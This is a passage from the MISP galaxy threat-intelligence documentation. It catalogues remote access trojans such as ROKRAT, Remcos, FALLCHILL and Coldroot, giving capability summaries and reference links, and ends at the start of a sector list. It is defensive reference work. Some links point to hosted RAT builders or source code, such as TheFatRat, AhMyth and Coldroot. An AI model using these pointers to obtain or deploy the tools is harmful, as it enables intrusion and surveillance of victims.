<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://virusguides.com/newly-discovered-mangit-malware-offers-banking-trojan-service/">http://virusguides.com/newly-discovered-mangit-malware-offers-banking-trojan-service/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/trojan-variants/mangit">https://www.cyber.nj.gov/threat-profiles/trojan-variants/mangit</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.softpedia.com/news/new-malware-mangit-surfaces-as-banking-trojan-as-a-service-505458.shtml">http://news.softpedia.com/news/new-malware-mangit-surfaces-as-banking-trojan-as-a-service-505458.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_legend"><a class="anchor" href="#_legend"></a><a class="link" href="#_legend">LeGeNd</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2334. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2016/08/legend-rat-v1.3-by-ahmed-ibrahim.html">http://www.connect-trojan.net/2016/08/legend-rat-v1.3-by-ahmed-ibrahim.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2016/11/legend-rat-v1.9-by-ahmed-ibrahim.html">http://www.connect-trojan.net/2016/11/legend-rat-v1.9-by-ahmed-ibrahim.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_revenge_rat"><a class="anchor" href="#_revenge_rat"></a><a class="link" href="#_revenge_rat">Revenge-RAT</a></h3>
<div class="paragraph">
<p>Revenge v0.1 was a simple tool, according to a researcher known as Rui, who says the malwares author didnt bother obfuscating the RATs source code. This raised a question mark with the researchers, who couldnt explain why VirusTotal scanners couldnt pick it up as a threat right away.Revenge, which was written in Visual Basic, also didnt feature too many working features, compared to similar RATs. Even Napolean admitted that his tool was still in the early development stages, a reason why he provided the RAT for free.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2335. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.securitynewspaper.com/2016/08/31/unsophisticated-revenge-rat-released-online-free-exclusive/">http://www.securitynewspaper.com/2016/08/31/unsophisticated-revenge-rat-released-online-free-exclusive/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vjw0rm_0_1"><a class="anchor" href="#_vjw0rm_0_1"></a><a class="link" href="#_vjw0rm_0_1">vjw0rm 0.1</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2336. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/816993165119016960?lang=en">https://twitter.com/malwrhunterteam/status/816993165119016960?lang=en</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rokrat"><a class="anchor" href="#_rokrat"></a><a class="link" href="#_rokrat">rokrat</a></h3>
<div class="paragraph">
<p>ROKRAT is a remote access trojan (RAT) that leverages a malicious Hangual Word Processor (HWP) document sent in spearphishing emails to infect hosts. The HWP document contains an embedded Encapsulated PostScript (EPS) object. The object exploits an EPS buffer overflow vulnerability and downloads a binary disguised as a .JPG file. The file is then decoded and the ROKRAT executable is initiated. The trojan uses legitimate Twitter, Yandex, and Mediafire websites for its command and control communications and exfiltration platforms, making them difficult to block globally. Additionally, the platforms use HTTPS connections, making it more difficult to gather additional data on its activities. Cisco&#8217;s Talos Group identified two email campaigns. In one, attackers send potential victims emails from an email server of a private university in Seoul, South Korea with a sender email address of "<a href="mailto:kgf2016@yonsei.ac.kr">kgf2016@yonsei.ac.kr</a>," the contact email for the Korea Global Forum, adding a sense of legitimacy to the email. It is likely that the email address was compromised and used by the attackers in this campaign. The second is less sophisticated and sends emails claiming to be from a free Korean mail service with a the subject line, "Request Help" and attached malicious HWP filename, "I&#8217;m a munchon person in Gangwon-do, North Korea." The ROKRAT developer uses several techniques to hinder analysis, including identifying tools usually used by malware analysts or within sandbox environments. Once it has infected a device, this trojan can execute commands, move a file, remove a file, kill a process, download and execute a file, upload documents, capture screenshots, and log keystrokes. Researchers believe the developer is a native Korean speaker and the campaign is currently targeting Korean-speakers.</p>
</div>
<div class="paragraph">
<p>rokrat is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ROKRAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2337. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/04/introducing-rokrat.html">http://blog.talosintelligence.com/2017/04/introducing-rokrat.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html">http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_qarallax"><a class="anchor" href="#_qarallax"></a><a class="link" href="#_qarallax">Qarallax</a></h3>
<div class="paragraph">
<p>Travelers applying for a US Visa in Switzerland were recently targeted by cyber-criminals linked to a malware called QRAT. Twitter user @hkashfi posted a Tweet saying that one of his friends received a file (US Travel Docs Information.jar) from someone posing as USTRAVELDOCS.COM support personnel using the Skype account ustravelidocs-switzerland (notice the “i” between “travel” and “docs”).</p>
</div>
<div class="paragraph">
<p>Qarallax is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>qrat</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2338. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/">https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moonwind_2"><a class="anchor" href="#_moonwind_2"></a><a class="link" href="#_moonwind_2">MoonWind</a></h3>
<div class="paragraph">
<p>MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2339. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/">https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0149">https://attack.mitre.org/wiki/Software/S0149</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remcos"><a class="anchor" href="#_remcos"></a><a class="link" href="#_remcos">Remcos</a></h3>
<div class="paragraph">
<p>Remcos is another RAT (Remote Administration Tool) that was first discovered being sold in hacking forums in the second half of 2016. Since then, it has been updated with more features, and just recently, weve seen its payload being distributed in the wild for the first time.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2340. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2">https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_client_maximus"><a class="anchor" href="#_client_maximus"></a><a class="link" href="#_client_maximus">Client Maximus</a></h3>
<div class="paragraph">
<p>The purpose of the Client Maximus malware is financial fraud. As such, its code aspires to create the capabilities that most banking Trojans have, which allow attackers to monitor victims web navigation and interrupt online banking session at will. After taking over a victims banking session, an attacker operating this malware can initiate a fraudulent transaction from the account and use social engineering screens to manipulate the unwitting victim into authorizing it.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2341. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/">https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_thefat_rat"><a class="anchor" href="#_thefat_rat"></a><a class="link" href="#_thefat_rat">TheFat RAT</a></h3>
<div class="paragraph">
<p>Thefatrat a massive exploiting tool revealed &gt;&gt; An easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most…</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2342. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/Screetsec/TheFatRat">https://github.com/Screetsec/TheFatRat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_redleaves_2"><a class="anchor" href="#_redleaves_2"></a><a class="link" href="#_redleaves_2">RedLeaves</a></h3>
<div class="paragraph">
<p>Since around October 2016, JPCERT/CC has been confirming information leakage and other damages caused by malware RedLeaves. It is a new type of malware which has been observed since 2016 in attachments to targeted emails.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2343. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/2017/04/redleaves---malware-based-on-open-source-rat.html">http://blog.jpcert.or.jp/2017/04/redleaves---malware-based-on-open-source-rat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rurktar"><a class="anchor" href="#_rurktar"></a><a class="link" href="#_rurktar">Rurktar</a></h3>
<div class="paragraph">
<p>Dubbed Rurktar, the tool hasnt had all of its functionality implemented yet, but G DATA says “it is relatively safe to say [it] is intended for use in targeted spying operations.” The malicious program could be used for reconnaissance operations, as well as to spy on infected computers users, and steal or upload files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2344. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.securityweek.com/rurktar-malware-espionage-tool-development">http://www.securityweek.com/rurktar-malware-espionage-tool-development</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ratattack"><a class="anchor" href="#_ratattack"></a><a class="link" href="#_ratattack">RATAttack</a></h3>
<div class="paragraph">
<p>RATAttack is a remote access trojan (RAT) that uses the Telegram protocol to support encrypted communication between the victim&#8217;s machine and the attacker. The Telegram protocol also provides a simple method to communicate to the target, negating the need for port forwarding. Before using RATAttack, the attacker must create a Telegram bot and embed the bot&#8217;s Telegram token into the trojan&#8217;s configuration file. When a system is infected with RATAttack, it connects to the bot&#8217;s Telegram channel. The attacker can then connect to the same channel and manage the RATAttack clients on the infected host machines. The trojan&#8217;s code was available on GitHub then was taken down by the author on April 19, 2017.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2345. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/trojan-variants/ratattack">https://www.cyber.nj.gov/threat-profiles/trojan-variants/ratattack</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_khrat"><a class="anchor" href="#_khrat"></a><a class="link" href="#_khrat">KhRAT</a></h3>
<div class="paragraph">
<p>So called because the Command and Control (C2) infrastructure from previous variants of the malware was located in Cambodia, as discussed by Roland Dela Paz at Forecpoint here, KHRAT is a Trojan that registers victims using their infected machines username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2346. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/">https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_revcode"><a class="anchor" href="#_revcode"></a><a class="link" href="#_revcode">RevCode</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2347. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://revcode.eu/">https://revcode.eu/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ahnyth_android"><a class="anchor" href="#_ahnyth_android"></a><a class="link" href="#_ahnyth_android">AhNyth Android</a></h3>
<div class="paragraph">
<p>Android Remote Administration Tool</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2348. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/AhMyth/AhMyth-Android-RAT">https://github.com/AhMyth/AhMyth-Android-RAT</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_socket23"><a class="anchor" href="#_socket23"></a><a class="link" href="#_socket23">Socket23</a></h3>
<div class="paragraph">
<p>SOCKET23 was launched from his web site and immedi- ately infected major French corporations between August and October 1998. The virus (distributing the Trojan) was known as W32/HLLP.DeTroie.A (alias W32/Cheval.TCV). Never had a virus so disrupted French industry. The author quickly offered his own remover and made his apologies on his web site (now suppressed). Jean-Christophe X (18) was arrested on Tuesday 15 June 1999 in the Paris area and placed under judicial investigation for fraudulent intrusion of data in a data processing system, suppression and fraudulent modification of data</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2349. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/magazine/1999/199908.pdf">https://www.virusbulletin.com/uploads/pdf/magazine/1999/199908.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powerrat"><a class="anchor" href="#_powerrat"></a><a class="link" href="#_powerrat">PowerRAT</a></h3>
</div>
<div class="sect2">
<h3 id="_macspy"><a class="anchor" href="#_macspy"></a><a class="link" href="#_macspy">MacSpy</a></h3>
<div class="paragraph">
<p>Standard macOS backdoor, offered via a 'malware-as-a-service' model. MacSpy is advertised as the "most sophisticated Mac spyware ever", with the low starting price of free. While the idea of malware-as-a-service (MaaS) isnt a new one with players such as Tox and Shark the game, it can be said that MacSpy is one of the first seen for the OS X platform.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2350. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service">https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dnsmessenger"><a class="anchor" href="#_dnsmessenger"></a><a class="link" href="#_dnsmessenger">DNSMessenger</a></h3>
<div class="paragraph">
<p>Talos recently analyzed an interesting malware sample that made use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker. This is an extremely uncommon and evasive way of administering a RAT. The use of multiple stages of Powershell with various stages being completely fileless indicates an attacker who has taken significant measures to avoid detection.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2351. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/03/dnsmessenger.html">http://blog.talosintelligence.com/2017/03/dnsmessenger.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pentagonrat"><a class="anchor" href="#_pentagonrat"></a><a class="link" href="#_pentagonrat">PentagonRAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2352. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://pentagon-rat.blogspot.fr/">http://pentagon-rat.blogspot.fr/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_newcore"><a class="anchor" href="#_newcore"></a><a class="link" href="#_newcore">NewCore</a></h3>
<div class="paragraph">
<p>NewCore is a remote access trojan first discovered by Fortinet researchers while conducting analysis on a China-linked APT campaign targeting Vietnamese organizations. The trojan is a DLL file, executed after a trojan downloader is installed on the targeted machine. Based on strings in the code, the trojan may be compiled from the publicly-available source code of the PcClient and PcCortr backdoor trojans.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2353. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/trojan-variants/newcore">https://www.cyber.nj.gov/threat-profiles/trojan-variants/newcore</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations">https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deeper_rat"><a class="anchor" href="#_deeper_rat"></a><a class="link" href="#_deeper_rat">Deeper RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_xyligan"><a class="anchor" href="#_xyligan"></a><a class="link" href="#_xyligan">Xyligan</a></h3>
</div>
<div class="sect2">
<h3 id="_h_w0rm"><a class="anchor" href="#_h_w0rm"></a><a class="link" href="#_h_w0rm">H-w0rm</a></h3>
</div>
<div class="sect2">
<h3 id="_htprat"><a class="anchor" href="#_htprat"></a><a class="link" href="#_htprat">htpRAT</a></h3>
<div class="paragraph">
<p>On November 8, 2016 a non-disclosed entity in Laos was spear-phished by a group closely related to known Chinese adversaries and most likely affiliated with the Chinese government. The attackers utilized a new kind of Remote Access Trojan (RAT) that has not been previously observed or reported. The new RAT extends the capabilities of traditional RATs by providing complete remote execution of custom commands and programming. htpRAT, uncovered by RiskIQ cyber investigators, is the newest weapon in the Chinese adversarys arsenal in a campaign against Association of Southeast Asian Nations (ASEAN). Most RATs can log keystrokes, take screenshots, record audio and video from a webcam or microphone, install and uninstall programs and manage files. They support a fixed set of commands operators can execute using different command IDs —file download or file upload, for example—and must be completely rebuilt to have different functionality. htpRAT, on the other hand, serves as a conduit for operators to do their job with greater precision and effect. On the Command and Control (C2) server side, threat actors can build new functionality in commands, which can be sent to the malware to execute. This capability makes htpRAT a small, agile, and incredibly dynamic piece of malware. Operators can change functionality, such as searching for a different file on the victims network, simply by wrapping commands.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2354. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cdn.riskiq.com/wp-content/uploads/2017/10/RiskIQ-htpRAT-Malware-Attacks.pdf?_ga=2.159415805.1155855406.1509033001-1017609577.1507615928">https://cdn.riskiq.com/wp-content/uploads/2017/10/RiskIQ-htpRAT-Malware-Attacks.pdf?_ga=2.159415805.1155855406.1509033001-1017609577.1507615928</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fallchill"><a class="anchor" href="#_fallchill"></a><a class="link" href="#_fallchill">FALLCHILL</a></h3>
<div class="paragraph">
<p>According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victims system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2355. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-318A">https://www.us-cert.gov/ncas/alerts/TA17-318A</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uboatrat"><a class="anchor" href="#_uboatrat"></a><a class="link" href="#_uboatrat">UBoatRAT</a></h3>
<div class="paragraph">
<p>Alto Networks Unit 42 has identified attacks with a new custom Remote Access Trojan (RAT) called UBoatRAT. The initial version of the RAT, found in May of 2017, was simple HTTP backdoor that uses a public blog service in Hong Kong and a compromised web server in Japan for command and control. The developer soon added various new features to the code and released an updated version in June. The attacks with the latest variants we found in September have following characteristics.
Targets personnel or organizations related to South Korea or video games industry
Distributes malware through Google Drive
Obtains C2 address from GitHub
Uses Microsoft Windows Background Intelligent Transfer Service(BITS) to maintain persistence.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2356. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/">https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crossrat"><a class="anchor" href="#_crossrat"></a><a class="link" href="#_crossrat">CrossRat</a></h3>
<div class="paragraph">
<p>The EFF/Lookout report describes CrossRat as a “newly discovered desktop surveillanceware tool…which is able to target Windows, OSX, and Linux.”</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2357. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://digitasecurity.com/blog/2018/01/23/crossrat/">https://digitasecurity.com/blog/2018/01/23/crossrat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tscookierat"><a class="anchor" href="#_tscookierat"></a><a class="link" href="#_tscookierat">TSCookieRAT</a></h3>
<div class="paragraph">
<p>TSCookie provides parameters such as C&amp;C server information when loading TSCookieRAT. Upon the execution, information of the infected host is sent with HTTP POST request to an external server. (The HTTP header format is the same as TSCookie.)
The data is RC4-encrypted from the beginning to 0x14 (the key is Date header value), which is followed by the information of the infected host (host name, user name, OS version, etc.). Please refer to Appendix C, Table C-1 for the data format.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2358. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html">http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coldroot"><a class="anchor" href="#_coldroot"></a><a class="link" href="#_coldroot">Coldroot</a></h3>
<div class="paragraph">
<p>Coldroot, a remote access trojan (RAT), is still undetectable by most antivirus engines, despite being uploaded and freely available on GitHub for almost two years.
The RAT appears to have been created as a joke, "to Play with Mac users," and "give Mac it&#8217;s rights in this [the RAT] field," but has since expanded to work all three major desktop operating systems — Linux, macOS, and Windows— according to a screenshot of its builder extracted from a promotional YouTube video.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2359. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/coldroot-rat-still-undetectable-despite-being-uploaded-on-github-two-years-ago/">https://www.bleepingcomputer.com/news/security/coldroot-rat-still-undetectable-despite-being-uploaded-on-github-two-years-ago/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/xlinshan/Coldroot">https://github.com/xlinshan/Coldroot</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_sector"><a class="anchor" href="#_sector"></a><a class="link" href="#_sector">Sector</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Activity sectors.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Sector is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/sector.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Various</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_unknown_3"><a class="anchor" href="#_unknown_3"></a><a class="link" href="#_unknown_3">Unknown</a></h3>
</div>
<div class="sect2">
<h3 id="_other"><a class="anchor" href="#_other"></a><a class="link" href="#_other">Other</a></h3>
</div>
<div class="sect2">
<h3 id="_academia_university"><a class="anchor" href="#_academia_university"></a><a class="link" href="#_academia_university">Academia - University</a></h3>
</div>
<div class="sect2">
<h3 id="_activists"><a class="anchor" href="#_activists"></a><a class="link" href="#_activists">Activists</a></h3>
</div>
<div class="sect2">
<h3 id="_aerospace"><a class="anchor" href="#_aerospace"></a><a class="link" href="#_aerospace">Aerospace</a></h3>
</div>
<div class="sect2">
<h3 id="_agriculture"><a class="anchor" href="#_agriculture"></a><a class="link" href="#_agriculture">Agriculture</a></h3>
</div>
<div class="sect2">
